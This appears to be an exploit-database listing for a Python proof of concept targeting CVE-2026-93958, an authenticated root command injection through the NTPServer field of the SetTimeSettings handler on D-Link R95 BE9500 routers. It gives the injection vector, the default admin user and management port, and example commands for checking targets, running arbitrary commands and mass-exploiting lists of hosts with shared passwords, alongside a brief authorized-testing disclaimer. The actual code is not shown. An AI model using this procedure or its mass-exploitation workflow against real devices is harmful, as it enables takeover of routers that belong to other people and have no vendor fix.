Skip to content
Exploit for CVE-2026

Exploit for CVE-2026

Sploitus • September 28, 2026

Python 3 PoC for **[CVE-2026-93958]( — **D-Link R95 BE9500** firmware **BE9500_1.00.16** (build **1.01B06**).

**CVE-2026-93958** — **OS command injection** (CWE-77 / CWE-78) in **`/bin/ssi`** **DHMAPI** (SOAP over HTTPS). The **`SetTimeSettings`** handler stores **`NTPServer`** without sanitization; UCI sync runs **`uci set …="%s"`** via a shell, so **backticks** in `NTPServer` execute as **root**.

**Prerequisites:** Valid **admin** web session (`Login` + **API-AUTH** HMAC). Default user **`Admin`**. Management port commonly **18443** (also try **443**).

**Impact:** Full device compromise (root RCE). **No vendor fix** recorded for **BE9500_1.00.16** (Sep 2026).

**Public research:** [FoundTL/D-Link-R95-BE9500](

**CVSS:** **9.4** (v4.0) / **9.1** (v3.1, `PR:H`, scope changed).

**PoC page:** [

Catalog: [

| **Firmware** | **BE9500_1.00.16** / **1.01B06** |

| **Vector** | `POST /DHMAPI/` → **SetTimeSettings** / **NTPServer** |

| **Exploit** | `` `cmd` `` injection; output via **`/www/pocbit93958.txt`** |

**Features:** Color CLI, **`--mode check`**, **`--mode exploit`**, **mass bulk** (`--list` + `-j`), JSONL + `exploited.txt`.

python poc.py -u 192.168.2.254:18443 --mode check

python poc.py -u 192.168.2.254:18443 -U Admin -P 'YourPass' --mode exploit

python poc.py -u 192.168.2.254:18443 -U Admin -P pass --mode exploit --command "uname -a"

python poc.py --list targets.example.txt --mode exploit -j 8

python poc.py --list targets.txt --mode exploit --password SharedAdminPass -j 12

Target line format: `host[:port] [username] [password]` (tab/space).

CVE-2026-93958 PoC: D-Link **R95 BE9500** DHMAPI **NTPServer** authenticated **root RCE**. DHMAPI login, SetTimeSettings injection, mass exploit. [PoCbit](

Authorized testing on devices you own or may assess only.

Extracted Entities